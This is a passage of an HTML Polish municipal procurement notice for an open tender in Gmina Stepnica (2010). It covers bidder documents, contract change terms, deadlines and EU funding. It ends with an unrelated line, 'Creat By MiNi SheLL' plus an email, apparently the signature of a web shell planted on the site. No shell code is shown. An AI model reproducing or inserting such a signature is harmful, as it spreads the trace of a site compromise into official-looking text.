<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.

14.10.1. Zmiana terminu realizacji przedmiotu umowy-  w przypadku nie wykonania do dnia 31.08.2010 r. 

14.10.3. Pozostałe zmiany:
a) zmiana obowiązującej stawki VAT:
-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
-	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami, 
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.

14.10.4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

14.10.5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stepnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać: 
Po uprzednim powiadomieniu listownie lub faksem. 
Cena 5,00 zł ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 09:00, miejsce: Gmina Stepnica z siedzibą w Urzędzie Gminy w Stepnicy
ul. Kościuszki 4
72-112  Stepnica
Pokój nr 6 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowane z Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com